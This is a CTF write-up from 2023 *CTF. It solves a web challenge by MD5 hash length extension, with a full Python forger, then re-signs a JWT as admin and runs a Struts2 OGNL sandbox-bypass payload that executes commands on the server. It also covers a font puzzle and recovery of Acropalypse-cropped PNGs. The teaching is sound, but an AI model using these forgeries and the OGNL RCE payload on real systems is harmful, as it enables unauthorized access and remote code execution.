2023 *CTF

web

jwt2struts

JWT forgery + Struts2

The challenge first says you must be logged in as admin, and the page source points to a second PHP file, which prints its own code:

<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    if ($username === "admin" && $password != "root") {
        if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}

The salt is unknown, but we are given md5($salt."adminroot") together with the salt length (14), so the hashed input was 14 + 9 = 23 bytes long. The check computes md5($salt."admin".$password) and only demands that $password is not exactly "root"; any value that begins with "root" is fine as long as we can produce the matching digest. MD5 is a Merkle-Damgård construction, so the known digest is simply the internal state after absorbing salt+"adminroot"+padding, and we can continue hashing from that state. This is a textbook hash length extension attack.

With hashpump, the "key" length is the 19 bytes we do not control (14-byte salt + "admin"), the known data is "root", and we append an arbitrary suffix ("pcat"):

hashpump -s e6ccbf12de9d33ec27a5bcfb6a3293df -d root -k 19 -a pcat
2172da389aa982830f221675fd46b1d2
root\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00pcat

The first output line is the new digest; the second is the password to send: the original "root", the glue padding MD5 itself would have inserted (0x80, zeros, and the 64-bit little-endian bit length 23*8 = 0xb8), then "pcat".
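To see what hashpump is doing, here is an added example (my code, not part of the original writeup or of the hashpump project) that implements MD5 from RFC 1321 with a resumable state and uses it to extend the known digest. The 19-byte secret length, the known data "root" and the suffix "pcat" are the values from the command above; the secret used inside self_check() is made up so the hand-rolled MD5 can be compared against hashlib.

```python
# Added example (not from the writeup): pure-Python MD5 length extension that
# reproduces `hashpump -s <hash> -d root -k 19 -a pcat`. hashlib is only used
# to self-check the hand-rolled MD5 with a constructed secret.
import hashlib
import math
import struct
from urllib.parse import quote

MASK32 = 0xFFFFFFFF
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & MASK32 for i in range(64)]
MD5_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md5_padding(msg_len):
    """Padding MD5 appends to a message of msg_len bytes: 0x80, zeros, 64-bit LE bit length."""
    zeros = (55 - msg_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", (msg_len * 8) & 0xFFFFFFFFFFFFFFFF)


def _md5_compress(state, block):
    """One 64-byte MD5 compression step (RFC 1321)."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & MASK32 & d), i
        elif i < 32:
            f, g = (d & b) | (~d & MASK32 & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | (~d & MASK32)), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & MASK32
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & MASK32
    return tuple((x + y) & MASK32 for x, y in zip(state, (a, b, c, d)))


def md5_from_state(state, data, total_len):
    """Absorb `data` starting from an intermediate `state`, padding as if total_len bytes
    had been hashed in all. With state=MD5_IV and total_len=len(data) this is plain MD5."""
    buf = data + md5_padding(total_len)
    for off in range(0, len(buf), 64):
        state = _md5_compress(state, buf[off:off + 64])
    return struct.pack("<4I", *state).hex()


def md5_hex(data):
    return md5_from_state(MD5_IV, data, len(data))


def length_extend(known_hex, secret_len, known_data, append):
    """Given known_hex = md5(secret || known_data) and len(secret), return
    (md5(secret || known_data || glue || append), known_data || glue || append)
    without knowing secret. The digest is reused as the starting state."""
    state = struct.unpack("<4I", bytes.fromhex(known_hex))
    glue = md5_padding(secret_len + len(known_data))
    forged = known_data + glue + append
    new_hex = md5_from_state(state, append, secret_len + len(forged))
    return new_hex, forged


def forge_password(known_hex, append=b"pcat"):
    """Challenge-specific wrapper: the uncontrolled prefix is salt (14) + 'admin' (5) = 19 bytes,
    the known data is 'root'. Returns (digest cookie value, percent-encoded password value)."""
    digest, forged = length_extend(known_hex, 19, b"root", append)
    return digest, quote(forged, safe="")


def self_check(secret=b"s" * 19):
    """Sanity check with a constructed secret: the extended hash must equal a real MD5."""
    known = hashlib.md5(secret + b"root").hexdigest()
    new_hex, forged = length_extend(known, len(secret), b"root", b"pcat")
    return (new_hex == hashlib.md5(secret + forged).hexdigest()
            and md5_hex(b"x" * 200) == hashlib.md5(b"x" * 200).hexdigest())


if __name__ == "__main__":
    digest, password = forge_password("e6ccbf12de9d33ec27a5bcfb6a3293df")
    print("self-check:", self_check())
    print("digest   =", digest)
    print("password =", password)
```

quote() percent-encodes every non-alphanumeric byte, so the password value it prints is exactly what the POST body below carries (hex case aside).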

The request then carries the forged digest in the cookie and the extended message as the password, percent-encoded byte by byte. PHP already URL-decodes $_POST and the script calls urldecode() a second time, but raw bytes containing no % pass through the second call unchanged, so one level of encoding is enough:

Cookie: access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyIiwiZXhwIjoyMDA2MjM3MjgxfQ.DgME42SM0WxvpwPpY0X4fuOG4eliu_SHeEw5v9cVWx0; digest=2172da389aa982830f221675fd46b1d2
Upgrade-Insecure-Requests: 1

username=admin&password=root%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00pcat

The server responds with the secret key:

sk-he00lctf3r

With the HS256 key known, we re-sign the access_token with sub changed from user to admin (header and exp unchanged):

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MjAwNjIzNzI4MX0.wdwnmjqyCO2fsVgOGjcgKrWJgij9fAyq1QHXIHkqK4Y
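An added example (my code, not from the writeup) that does the re-signing with the standard library instead of a JWT library: it decodes the user token, checks it against the recovered key, swaps sub and signs again. The key and the user token are the ones shown on this page; the helper names are my own.

```python
# Added example (not from the writeup): verify and re-sign an HS256 JWT with
# nothing but the standard library, using the key leaked by the PHP endpoint.
import base64
import hashlib
import hmac
import json

# Values taken from the writeup above.
SECRET = b"sk-he00lctf3r"
USER_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
              "eyJzdWIiOiJ1c2VyIiwiZXhwIjoyMDA2MjM3MjgxfQ."
              "DgME42SM0WxvpwPpY0X4fuOG4eliu_SHeEw5v9cVWx0")


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def decode_unverified(token):
    """Return (header, payload) dicts without checking the signature."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def hs256_sign(header, payload, key):
    """Build a compact JWT. separators=(",", ":") gives the compact JSON most
    libraries emit, so the header/payload segments match the original token."""
    dumps = lambda o: json.dumps(o, separators=(",", ":")).encode()
    signing_input = b64url_encode(dumps(header)) + "." + b64url_encode(dumps(payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def hs256_verify(token, key):
    """Constant-time HS256 check. Tokens whose alg is anything else (e.g. 'none')
    are rejected outright rather than dispatched on the attacker-chosen alg."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return False
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return False
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def forge_admin(token, key):
    """Keep the original header and claims, change only sub, re-sign with the leaked key."""
    header, payload = decode_unverified(token)
    payload = dict(payload, sub="admin")
    return hs256_sign(header, payload, key)


if __name__ == "__main__":
    print("user token verifies with leaked key:", hs256_verify(USER_TOKEN, SECRET))
    print("Cookie: access_token=" + forge_admin(USER_TOKEN, SECRET))
```

The verify step is worth keeping in a real engagement: if the leaked key does not validate the token you already have, the server is signing with something else and the forged token will be rejected.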

Finally, RCE. The admin side runs on Struts2 and evaluates user input as OGNL, so the classic sandbox-bypass payload applies: it re-enables static method access on #_memberAccess, sets xwork.MethodAccessor.denyMethodExecution to false, and runs `env` through java.lang.Runtime, reading the process output with commons-io IOUtils. The surrounding ' + ... + ' closes and reopens the string the input is concatenated into, so the parenthesised expression is evaluated instead of being treated as literal text.

payload:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())) + '


MISC

old language

AN ancient old language

A Google reverse image search identifies the script as the Dragon Alphabet [Thuum] font:

[Dragon Alphabet Thuum] font - FFonts.net

Mapping each glyph against the font's character table gives the flag.

snippingTools

Alice is taking part in a CTF. She has just solved a challenge and obtained the flag. Delighted, she cannot wait to share the good news with Bob, so she presses Shift+Win+S to open the Windows 11 Snipping Tool, captures the whole screen and saves it as 1.png. Then, because the rules say flags must be kept secret, she uses the Snipping Tool's crop feature to cut away part of the flag and saves the cropped result over the original 1.png. Finally she sends 1.png to Bob. Bob immediately knows her whole flag. Do you know how?

A quick search shows that the Windows 11 Snipping Tool has a privacy bug: an image that was cropped and saved over the original can be restored, because the tool overwrites the file in place without truncating it, so the data of the original image is still there after the cropped PNG's IEND chunk.

Windows 11 Snipping Tool privacy bug exposes cropped image content - Zhihu (zhihu.com)

Will Dormann on Twitter: "Can confirm. Easy test: 1. Copy an image (to have a backup) 2. Open one with Snipping tool 3. Crop it to make it much smaller 4. Click the Save icon 5. Compare file sizes of cropped and original 6. Wonder about the world that you live in https://t.co/g19MTxlzN1"

The bug has an assigned CVE number: CVE-2023-28303, known as Acropalypse.

An exploitation script is available on GitHub: frankthetank-music/Acropalypse-Multi-Tool: Easily detect and restore Acropalypse vulnerable PNG and GIF files with simple Python GUI. (github.com)

Running the tool under Python 3.10 restores the hidden part of the image and reveals the flag.
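As an added example (my code, neither from the writeup nor from the Acropalypse-Multi-Tool), here is a minimal detector for the condition that tool looks for: bytes left behind after a PNG's IEND chunk. Both PNGs are generated inside the script so it runs offline, and simulate_crop_in_place() is my assumption about how the in-place overwrite leaves the old file's tail in place, not a reproduction of the Snipping Tool itself. Restoring the hidden pixels from that tail is what the referenced tool does and is not attempted here.

```python
# Added example (not from the writeup or the Acropalypse-Multi-Tool): a PNG
# chunk walker that flags data after the IEND chunk, the tell-tale sign of
# an Acropalypse-affected file. Test PNGs are constructed inline.
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype, data):
    """Serialize one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width, height, rgb=(255, 0, 0)):
    """Build a minimal valid 8-bit RGB PNG filled with one colour (constructed test input)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    row = b"\x00" + bytes(rgb) * width  # filter type 0, then the pixels
    idat = zlib.compress(row * height)
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")


def inspect_png(blob):
    """Walk chunks up to IEND and report what follows it.
    Returns {"chunks": [...], "iend_offset": int, "trailing": int, "suspicious": bool}."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        end = pos + 12 + length  # 8-byte header + data + 4-byte CRC
        if end > len(blob):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        chunks.append(ctype.decode("latin-1"))
        pos = end
        if ctype == b"IEND":
            break
    else:
        raise ValueError("no IEND chunk found")
    trailing = len(blob) - pos
    return {"chunks": chunks, "iend_offset": pos, "trailing": trailing, "suspicious": trailing > 0}


def simulate_crop_in_place(original, cropped):
    """Assumed model of the bug: the cropped file is written over the start of the
    original without truncating it, so the original's tail (IDAT data, IEND) survives."""
    if len(cropped) >= len(original):
        raise ValueError("cropped image must be smaller than the original for this model")
    return cropped + original[len(cropped):]


if __name__ == "__main__":
    original = make_png(256, 256)
    cropped = make_png(2, 2)
    leaked = simulate_crop_in_place(original, cropped)
    for name, blob in (("saved fresh", cropped), ("saved over original", leaked)):
        print(f"{name}: {inspect_png(blob)}")
```

This is the programmatic version of the file-size comparison in the tweet above: a freshly written PNG ends at its IEND chunk, so any trailing bytes mean the container was overwritten rather than truncated.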